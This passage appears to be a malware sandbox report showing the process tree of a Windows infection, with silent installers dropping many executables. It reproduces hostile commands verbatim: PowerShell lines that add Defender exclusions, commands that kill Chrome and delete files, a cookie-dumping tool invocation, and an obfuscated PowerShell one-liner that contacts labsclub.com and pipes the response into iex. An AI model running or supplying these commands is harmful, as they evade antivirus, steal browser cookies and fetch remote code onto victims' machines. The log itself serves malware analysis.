        "C:\Users\Admin\AppData\Local\Temp\AKYAMOCSPU\prolab.exe" /VERYSILENT
        15⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\is-HKQQE.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HKQQE.tmp\prolab.tmp" /SL5="$80250,575243,216576,C:\Users\Admin\AppData\Local\Temp\AKYAMOCSPU\prolab.exe" /VERYSILENT
        16⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\9c-a4762-a71-16db1-c00245aa03f64\Vewushaehaeshu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9c-a4762-a71-16db1-c00245aa03f64\Vewushaehaeshu.exe"
        15⤵
        
        PID:6400
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i3hf3qjb.bpl\GcleanerWW.exe /mixone & exit
        16⤵
        
        PID:5160
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe & exit
        16⤵
        
        PID:6988
        
        C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe
        17⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe
        18⤵
        
        PID:5464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\retpzulk.2bx\setup.exe /8-2222 & exit
        16⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\retpzulk.2bx\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\retpzulk.2bx\setup.exe /8-2222
        17⤵
        
        PID:4280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dawn-Morning"
        18⤵
        
        PID:5220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nplyswpy.0uh\MultitimerFour.exe & exit
        16⤵
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\nplyswpy.0uh\MultitimerFour.exe
        
        C:\Users\Admin\AppData\Local\Temp\nplyswpy.0uh\MultitimerFour.exe
        17⤵
        
        PID:6964
        
        C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        18⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe" 1 3.1615014732.60432b4cf3ff4 104
        19⤵
        
        PID:8
        
        C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe" 2 3.1615014732.60432b4cf3ff4
        20⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\q3hw4hryqux\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\q3hw4hryqux\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\is-I7U3F.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I7U3F.tmp\vict.tmp" /SL5="$602CE,870426,780800,C:\Users\Admin\AppData\Local\Temp\q3hw4hryqux\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\is-PAEJG.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-PAEJG.tmp\wimapi.exe" 535
        23⤵
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\y0hz5n3lfsa\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\y0hz5n3lfsa\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\is-2JIVQ.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2JIVQ.tmp\Setup3310.tmp" /SL5="$70342,802346,56832,C:\Users\Admin\AppData\Local\Temp\y0hz5n3lfsa\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\is-K3OCE.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-K3OCE.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:6196
        
        C:\Users\Admin\AppData\Local\Temp\is-HU85G.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HU85G.tmp\Setup.tmp" /SL5="$D024A,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-K3OCE.tmp\Setup.exe" /Verysilent
        24⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\ProPlugin.exe" /Verysilent
        25⤵
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\is-F8L82.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F8L82.tmp\ProPlugin.tmp" /SL5="$105AC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\ProPlugin.exe" /Verysilent
        26⤵
        
        PID:6184
        
        C:\Users\Admin\AppData\Local\Temp\is-84JEG.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-84JEG.tmp\Setup.exe"
        27⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"
        28⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\PictureLAb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\PictureLAb.exe" /Verysilent
        25⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\is-PQ85M.tmp\PictureLAb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PQ85M.tmp\PictureLAb.tmp" /SL5="$205AC,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\PictureLAb.exe" /Verysilent
        26⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Temp\is-JVKK9.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JVKK9.tmp\Setup.exe" /VERYSILENT
        27⤵
        
        PID:6800
        
        C:\Users\Admin\AppData\Local\Temp\is-JN24M.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JN24M.tmp\Setup.tmp" /SL5="$30606,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-JVKK9.tmp\Setup.exe" /VERYSILENT
        28⤵
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\is-A6BQD.tmp\kkkk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-A6BQD.tmp\kkkk.exe" /S /UID=lab214
        29⤵
        
        PID:7092
        
        C:\Users\Admin\AppData\Local\Temp\e2-7e660-d62-0e1af-53344f5d5b641\Bexutybaera.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e2-7e660-d62-0e1af-53344f5d5b641\Bexutybaera.exe"
        30⤵
        
        PID:4480
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4hq4twmn.hb1\GcleanerWW.exe /mixone & exit
        31⤵
        
        PID:9660
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe & exit
        31⤵
        
        PID:10048
        
        C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe
        32⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe
        33⤵
        
        PID:10780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sh454xlv.rmo\setup.exe /8-2222 & exit
        31⤵
        
        PID:8796
        
        C:\Users\Admin\AppData\Local\Temp\sh454xlv.rmo\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\sh454xlv.rmo\setup.exe /8-2222
        32⤵
        
        PID:10428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Nameless-Glade"
        33⤵
        
        PID:10596
        
        C:\Program Files (x86)\Nameless-Glade\7za.exe
        
        "C:\Program Files (x86)\Nameless-Glade\7za.exe" e -p154.61.71.51 winamp-plugins.7z
        33⤵
        
        PID:8328
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gwi1ebbx.g11\MultitimerFour.exe & exit
        31⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\gwi1ebbx.g11\MultitimerFour.exe
        
        C:\Users\Admin\AppData\Local\Temp\gwi1ebbx.g11\MultitimerFour.exe
        32⤵
        
        PID:10504
        
        C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        33⤵
        
        PID:11148
        
        C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe" 1 3.1615014842.60432bba8f0e2 104
        34⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe" 2 3.1615014842.60432bba8f0e2
        35⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\b1unxf3ujxu\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b1unxf3ujxu\safebits.exe" /S /pubid=1 /subid=451
        36⤵
        
        PID:8912
        
        C:\Users\Admin\AppData\Local\Temp\1k1mylzensw\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1k1mylzensw\askinstall24.exe"
        36⤵
        
        PID:8928
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        37⤵
        
        PID:9476
        
        C:\Users\Admin\AppData\Local\Temp\teecelwmiv5\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\teecelwmiv5\vict.exe" /VERYSILENT /id=535
        36⤵
        
        PID:8920
        
        C:\Users\Admin\AppData\Local\Temp\is-B96BT.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B96BT.tmp\vict.tmp" /SL5="$A05D4,870426,780800,C:\Users\Admin\AppData\Local\Temp\teecelwmiv5\vict.exe" /VERYSILENT /id=535
        37⤵
        
        PID:9152
        
        C:\Users\Admin\AppData\Local\Temp\is-GBM2B.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GBM2B.tmp\wimapi.exe" 535
        38⤵
        
        PID:9564
        
        C:\Users\Admin\AppData\Local\Temp\tfkko3lza10\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tfkko3lza10\Setup3310.exe" /Verysilent /subid=577
        36⤵
        
        PID:9040
        
        C:\Users\Admin\AppData\Local\Temp\is-TFA1G.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TFA1G.tmp\Setup3310.tmp" /SL5="$40636,802346,56832,C:\Users\Admin\AppData\Local\Temp\tfkko3lza10\Setup3310.exe" /Verysilent /subid=577
        37⤵
        
        PID:9140
        
        C:\Users\Admin\AppData\Local\Temp\2nxh3njplb4\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2nxh3njplb4\chashepro3.exe" /VERYSILENT
        36⤵
        
        PID:9088
        
        C:\Users\Admin\AppData\Local\Temp\is-AEMSP.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AEMSP.tmp\chashepro3.tmp" /SL5="$501FE,2015144,58368,C:\Users\Admin\AppData\Local\Temp\2nxh3njplb4\chashepro3.exe" /VERYSILENT
        37⤵
        
        PID:9172
        
        C:\Users\Admin\AppData\Local\Temp\antyy1a0aas\blhs03mm0gs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\antyy1a0aas\blhs03mm0gs.exe" /ustwo INSTALL
        36⤵
        
        PID:9080
        
        C:\Users\Admin\AppData\Local\Temp\st5eltxq4cu\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\st5eltxq4cu\app.exe" /8-23
        36⤵
        
        PID:9576
        
        C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\Delta.exe" /Verysilent
        25⤵
        
        PID:6792
        
        C:\Users\Admin\AppData\Local\Temp\is-DMFCH.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DMFCH.tmp\Delta.tmp" /SL5="$40606,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\Delta.exe" /Verysilent
        26⤵
        
        PID:6140
        
        C:\Users\Admin\AppData\Local\Temp\is-0BE1C.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0BE1C.tmp\Setup.exe" /VERYSILENT
        27⤵
        
        PID:9872
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-0BE1C.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        28⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        29⤵
        Kills process with taskkill
        
        PID:11156
        
        C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\zznote.exe" /Verysilent
        25⤵
        
        PID:10072
        
        C:\Users\Admin\AppData\Local\Temp\is-RHV1C.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RHV1C.tmp\zznote.tmp" /SL5="$405AC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\zznote.exe" /Verysilent
        26⤵
        
        PID:10144
        
        C:\Users\Admin\AppData\Local\Temp\is-HBIN0.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HBIN0.tmp\jg4_4jaa.exe" /silent
        27⤵
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\hjjgaa.exe" /Verysilent
        25⤵
        
        PID:10604
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        26⤵
        
        PID:11044
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        26⤵
        
        PID:10784
        
        C:\Users\Admin\AppData\Local\Temp\2jzkrcqwf2a\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2jzkrcqwf2a\safebits.exe" /S /pubid=1 /subid=451
        21⤵
        
        PID:5072
        
        C:\Users\Admin\AppData\Local\Temp\czgw54vlzkk\a531j3uggm3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\czgw54vlzkk\a531j3uggm3.exe" /ustwo INSTALL
        21⤵
        
        PID:6572
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 656
        22⤵
        Program crash
        
        PID:5012
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 668
        22⤵
        Program crash
        
        PID:6988
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 672
        22⤵
        Program crash
        
        PID:5196
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 820
        22⤵
        Program crash
        
        PID:6220
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 896
        22⤵
        Program crash
        
        PID:5132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 936
        22⤵
        Program crash
        
        PID:5064
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 1088
        22⤵
        Program crash
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\0rcvq0dm54k\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0rcvq0dm54k\askinstall24.exe"
        21⤵
        
        PID:5444
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        22⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        23⤵
        Kills process with taskkill
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\wqvri2e3kwd\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wqvri2e3kwd\vpn.exe" /silent /subid=482
        21⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\is-5TGRL.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5TGRL.tmp\vpn.tmp" /SL5="$703FE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\wqvri2e3kwd\vpn.exe" /silent /subid=482
        22⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\mxwtmnp4img\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mxwtmnp4img\app.exe" /8-23
        21⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Autumn-Flower"
        22⤵
        
        PID:4700
        
        C:\Program Files (x86)\Autumn-Flower\7za.exe
        
        "C:\Program Files (x86)\Autumn-Flower\7za.exe" e -p154.61.71.51 winamp-plugins.7z
        22⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Autumn-Flower\app.exe" -map "C:\Program Files (x86)\Autumn-Flower\WinmonProcessMonitor.sys""
        22⤵
        
        PID:1328
        
        C:\Program Files (x86)\Autumn-Flower\app.exe
        
        "C:\Program Files (x86)\Autumn-Flower\app.exe" -map "C:\Program Files (x86)\Autumn-Flower\WinmonProcessMonitor.sys"
        23⤵
        
        PID:4816
        
        C:\Program Files (x86)\Autumn-Flower\7za.exe
        
        "C:\Program Files (x86)\Autumn-Flower\7za.exe" e -p154.61.71.51 winamp.7z
        22⤵
        
        PID:5988
        
        C:\Program Files (x86)\Autumn-Flower\app.exe
        
        "C:\Program Files (x86)\Autumn-Flower\app.exe" /8-23
        22⤵
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\chp33zwu2sk\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chp33zwu2sk\chashepro3.exe" /VERYSILENT
        21⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\is-HAJSG.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HAJSG.tmp\chashepro3.tmp" /SL5="$7020C,2015144,58368,C:\Users\Admin\AppData\Local\Temp\chp33zwu2sk\chashepro3.exe" /VERYSILENT
        22⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\Delta.exe" /Verysilent
        10⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\is-A0TDL.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-A0TDL.tmp\Delta.tmp" /SL5="$3054E,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\Delta.exe" /Verysilent
        11⤵
        
        PID:6912
        
        C:\Users\Admin\AppData\Local\Temp\is-Q8QPS.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q8QPS.tmp\Setup.exe" /VERYSILENT
        12⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-Q8QPS.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        13⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        14⤵
        Kills process with taskkill
        
        PID:6872
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        14⤵
        Delays execution with timeout.exe
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\zznote.exe" /Verysilent
        10⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\is-JSJHR.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JSJHR.tmp\zznote.tmp" /SL5="$8024A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\zznote.exe" /Verysilent
        11⤵
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\is-UP0KN.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UP0KN.tmp\jg4_4jaa.exe" /silent
        12⤵
        
        PID:7016
        
        C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\hjjgaa.exe" /Verysilent
        10⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        11⤵
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        11⤵
        
        PID:5976
      - C:\Users\Admin\AppData\Local\Temp\di5n0uxkael\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\di5n0uxkael\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        6⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\is-HL321.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HL321.tmp\IBInstaller_97039.tmp" /SL5="$3026A,14452723,721408,C:\Users\Admin\AppData\Local\Temp\di5n0uxkael\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        7⤵
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\is-SGB4P.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-SGB4P.tmp\{app}\chrome_proxy.exe"
        8⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-SGB4P.tmp\{app}\chrome_proxy.exe"
        9⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        10⤵
        Runs ping.exe
        
        PID:1512
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        8⤵
        
        PID:5356
      - C:\Users\Admin\AppData\Local\Temp\1hhka2x1t4a\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1hhka2x1t4a\vict.exe" /VERYSILENT /id=535
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\is-OUNC4.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OUNC4.tmp\vict.tmp" /SL5="$1025C,870426,780800,C:\Users\Admin\AppData\Local\Temp\1hhka2x1t4a\vict.exe" /VERYSILENT /id=535
        7⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\is-55CAN.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-55CAN.tmp\wimapi.exe" 535
        8⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Local\Temp\t3v3J58Id.exe
        
        "C:\Users\Admin\AppData\Local\Temp\t3v3J58Id.exe"
        9⤵
        
        PID:6528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im t3v3J58Id.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\t3v3J58Id.exe" & del C:\ProgramData\*.dll & exit
        10⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im t3v3J58Id.exe /f
        11⤵
        Kills process with taskkill
        
        PID:6852
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        11⤵
        Delays execution with timeout.exe
        
        PID:1232
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        9⤵
        
        PID:5920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        10⤵
        
        PID:4804
      - C:\Users\Admin\AppData\Local\Temp\qolc0vl4cj1\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qolc0vl4cj1\safebits.exe" /S /pubid=1 /subid=451
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4376
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\qolc0vl4cj1\safebits.exe
        7⤵
        
        PID:2112
      - C:\Users\Admin\AppData\Local\Temp\21a0yj4ifpf\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\21a0yj4ifpf\vpn.exe" /silent /subid=482
        6⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\is-8SI3V.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8SI3V.tmp\vpn.tmp" /SL5="$1031E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\21a0yj4ifpf\vpn.exe" /silent /subid=482
        7⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        8⤵
        
        PID:1676
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        9⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        8⤵
        
        PID:6752
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
